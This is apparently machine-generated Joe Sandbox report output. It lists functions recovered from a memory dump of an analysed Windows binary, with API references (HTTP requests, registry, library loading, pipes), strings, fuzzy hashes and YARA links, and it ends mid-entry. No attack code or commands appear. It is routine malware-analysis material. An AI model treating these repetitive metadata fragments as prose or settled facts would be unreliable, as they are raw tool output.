
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: bcb9b1539e24f7706c36efd3dd6a9b78094ba629b98eaeacde9b75919a2b0752
Instruction ID: 9a72959f535f749975b0378185b58832b5077b0cc4572ec4a8ba2814b5ac969b
Opcode Fuzzy Hash: bcb9b1539e24f7706c36efd3dd6a9b78094ba629b98eaeacde9b75919a2b0752
Instruction Fuzzy Hash: F741B1B1601204EFDF24DF14C884B9A7BA9EF48316F1581A9EE09DF205D7B0DD49EBA0

Function 00F62753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F627C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F627DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00F62822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FC5890,00000000), ref: 00F6286B

Strings

0, xrefs: 00F627B5

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: a13f42837034f9dcd6c4da03890a51328b9e95604660eac984bfbd9a20a5740e
Instruction ID: 68efe2426a89f8a357a0a21ce9bd39d2bf2c4681ed041cf47306d3a8ccaf0a55
Opcode Fuzzy Hash: a13f42837034f9dcd6c4da03890a51328b9e95604660eac984bfbd9a20a5740e
Instruction Fuzzy Hash: 3E41A071A047019FD760DF28CC44B6ABBE4EF85324F04492EF8A59B2D2D734A805EB62

Function 00F7D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F7D7C5

Part of subcall function 00F0784B: _memmove.LIBCMT ref: 00F07899

Strings

stdcall, xrefs: 00F7D847
cdecl, xrefs: 00F7D81C
winapi, xrefs: 00F7D836
none, xrefs: 00F7D8A0

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 2fbd62235f1ff83ec60ae37863dc0afcd528a66eb1f176150d069ce2edce229e
Instruction ID: d80ce44be29682b5a248fd00b148204d4c997b81e925d53675c93ecf50ff1ec6
Opcode Fuzzy Hash: 2fbd62235f1ff83ec60ae37863dc0afcd528a66eb1f176150d069ce2edce229e
Instruction Fuzzy Hash: 6931CF71904219AFCF00EF54CC919EEB3B5FF00320B50866AE829976D2DB75E905EF81

Function 00F58E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F58F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F58F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00F58F57

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Strings

ListBox, xrefs: 00F58ED3
ComboBox, xrefs: 00F58E9E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: c1462fc70293ecd499e1dd2e3d2c1f0faaabd140239a7e4222da9cc5526d46b6
Instruction ID: 55d620585d876fa126d6c1a004015008a59d1ffdebd2e6c80b0a9c99dd910003
Opcode Fuzzy Hash: c1462fc70293ecd499e1dd2e3d2c1f0faaabd140239a7e4222da9cc5526d46b6
Instruction Fuzzy Hash: D121F275A00208BEDB14ABA09C45DFFB7A9DF45360F104629F925A71E1DE39580EBA20

Function 00F7182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F71872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F718A2
InternetCloseHandle.WININET(00000000), ref: 00F718E9

Part of subcall function 00F72483: GetLastError.KERNEL32(?,?,00F71817,00000000,00000000,00000001), ref: 00F72498
Part of subcall function 00F72483: SetEvent.KERNEL32(?,?,00F71817,00000000,00000000,00000001), ref: 00F724AD

Strings

, xrefs: 00F71893

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 6e8841811489bb88ad796fcaa651d11b5a3093bfa4b31b2629371bb23ec0cf17
Instruction ID: 1ef1dd3814ebd881a4ac150fafee5fe00f89a20b68480acdcf53e90d77601ccb
Opcode Fuzzy Hash: 6e8841811489bb88ad796fcaa651d11b5a3093bfa4b31b2629371bb23ec0cf17
Instruction Fuzzy Hash: 4D217FB160020CBFEB119F68DC85FBF76ADFB48754F10812BF54996140DA249D09A7A2

Function 00F863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F86461
LoadLibraryW.KERNEL32(?), ref: 00F86468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F8647D
DestroyWindow.USER32(?), ref: 00F86485

Strings

SysAnimate32, xrefs: 00F8643C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 88e8cde2d6283dcac26919d9793a5ac381c2a9a679654f6ea812e296d0d4e446
Instruction ID: 995b30274dea739af2c39a1a6839545541a126b918da1785b9598fff4d5fcebe
Opcode Fuzzy Hash: 88e8cde2d6283dcac26919d9793a5ac381c2a9a679654f6ea812e296d0d4e446
Instruction Fuzzy Hash: 38217971610209AFEF10AF64DC84EFA77A9EB58338F204629FA10D21A0D6719C81B760

Function 00F66D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00F66DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F66DEF
GetStdHandle.KERNEL32(0000000C), ref: 00F66E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F66E3B

Strings

nul, xrefs: 00F66E36

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 9e0d601f93c74276bec05fef7195e278e9df575b575a1514c5a9089f20b9d289
Instruction ID: 1ee895b69a30320e19803fc841777d8c56259f7518d572ea6228bcbf13539119
Opcode Fuzzy Hash: 9e0d601f93c74276bec05fef7195e278e9df575b575a1514c5a9089f20b9d289
Instruction Fuzzy Hash: 7621A175A00209AFDB209F29DC05BAA7BF8EF54730F204A29FCA0D72D0DB719955EB54

Function 00F66E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00F66E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F66EBB
GetStdHandle.KERNEL32(000000F6), ref: 00F66ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F66F06

Strings

nul, xrefs: 00F66F01

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 9f19cd1f95dfd5769590aa1da7cee98dbfcf0acba58a0cd5dd750739047df0cb
Instruction ID: 3a37d76088680c0978f8baa440b4c70b5bc187fae78bd314c23f719f8b08030c
Opcode Fuzzy Hash: 9f19cd1f95dfd5769590aa1da7cee98dbfcf0acba58a0cd5dd750739047df0cb
Instruction Fuzzy Hash: C621C279A007099FDB209F69DC04AAA77E8EF65730F200B19FCA0D72D0DB71A851EB54

Function 00F6AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F6AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F6ACA8
__swprintf.LIBCMT ref: 00F6ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00F8F910), ref: 00F6ACFF

Strings

%lu, xrefs: 00F6ACBB

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 98f298376822d3471aff861e565e590ac088d669f37e11dcd36c5d8371a0360d
Instruction ID: 14cd4098821bc07e9aca991657a1d91d99d9d21b0d4e63f9c13b7d157a4b24cf
Opcode Fuzzy Hash: 98f298376822d3471aff861e565e590ac088d669f37e11dcd36c5d8371a0360d
Instruction Fuzzy Hash: 59218370A00109AFCB10EF65CD85DEE7BB8FF89714B004069F909EB252DB75EA55EB21

Function 00F61AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F61B19

Strings

KEYS, xrefs: 00F61B30
APPEND, xrefs: 00F61B52
EXISTS, xrefs: 00F61B41
REMOVE, xrefs: 00F61B1F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: fee731a897992d320f0ec950a73a1f10fa9440452c8b437f92780f008b182ff7
Instruction ID: c58c36e8d04b8c3f93731b40d78c7f7a950c1ffe4af0defbd3fc6004a71e561a
Opcode Fuzzy Hash: fee731a897992d320f0ec950a73a1f10fa9440452c8b437f92780f008b182ff7
Instruction Fuzzy Hash: F8113C319102198FCF00EF54DC919EEB7B4BF65314B5844A5D815A7292EB365906FF50

Function 00F7EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F7EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F7EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F7ED6A
CloseHandle.KERNEL32(?), ref: 00F7EDEB

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 0ed3aa74e44759093723d6b7aeea3d1aabc381d409ad065af36339710fcd0107
Instruction ID: 8a4a7c2890df940c21896661fb27fb7c471b12b5041324b3cab0fc12280a1541
Opcode Fuzzy Hash: 0ed3aa74e44759093723d6b7aeea3d1aabc381d409ad065af36339710fcd0107
Instruction Fuzzy Hash: 118184716047009FD720DF18CC46F6AB7E5AF48720F44C91EF9999B3D2D6B49C41AB42

Function 00F2541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F2547B
_memcpy_s.LIBCMT ref: 00F254ED
__read_nolock.LIBCMT ref: 00F2554B
__filbuf.LIBCMT ref: 00F2556E
_memset.LIBCMT ref: 00F255B2

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: e2512e4eb22ad12e72e94d50599256bea9db8cb26ec6e29d2d6fe779b5e512e3
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 54511871E00B25DBCB24DFA9FC5166EB7A2AF40B35F288729F825962C0D774DD50AB40

Function 00F80037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7FDAD,?,?), ref: 00F80E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F800FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F80183
RegCloseKey.ADVAPI32(?,?), ref: 00F801AF
RegCloseKey.ADVAPI32(00000000), ref: 00F801BC

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: fb1d114ef11c616483abe0b8863db597c0a074f4e753f1595c779c9128f9a968
Instruction ID: 884009ebbdcc995dbf11b54492f066b55e855aad0ab47c26364370657772a5f4
Opcode Fuzzy Hash: fb1d114ef11c616483abe0b8863db597c0a074f4e753f1595c779c9128f9a968
Instruction Fuzzy Hash: 76517B71608204AFC704EF54CC85EAAB7E9FF84314F44492DF595872A2DB35E908EB52

Function 00F7D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F7D927
GetProcAddress.KERNEL32(00000000,?), ref: 00F7D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00F7D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00F7DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F7DA21

Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67896,?,?,00000000), ref: 00F05A2C
Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67896,?,?,00000000,?,?), ref: 00F05A50

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: dc585d9c0cf4ae1c55647087c718c08924692be8ec6dd476765e14e1a53472d6
Instruction ID: c958c6a224b65df7d0e8186e9a5d55acc09ab72d173ba744bf06225977b64d54
Opcode Fuzzy Hash: dc585d9c0cf4ae1c55647087c718c08924692be8ec6dd476765e14e1a53472d6
Instruction Fuzzy Hash: 9A514775A04209DFDB00EFA8C8849ADB7B5FF08320B44C06AE959AB352D778ED45EF51

Function 00F6E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F6E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F6E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F6E687

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F6E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F6E6B4

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: ecb698bc63f0b40a031b9cce52d114afc8c0aea836037e8aebf8d360c5a2eb97
Instruction ID: 6c817509a3fb7898e3ce4a1f8eac5c2c98e8343a8b0b641b385d9022aeedf0ec
Opcode Fuzzy Hash: ecb698bc63f0b40a031b9cce52d114afc8c0aea836037e8aebf8d360c5a2eb97
Instruction Fuzzy Hash: EC512D75A00105DFCB01EF64C985AAEBBF5EF09314F1480A9E809AB3A2DB75ED15EF50

Function 00F8A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

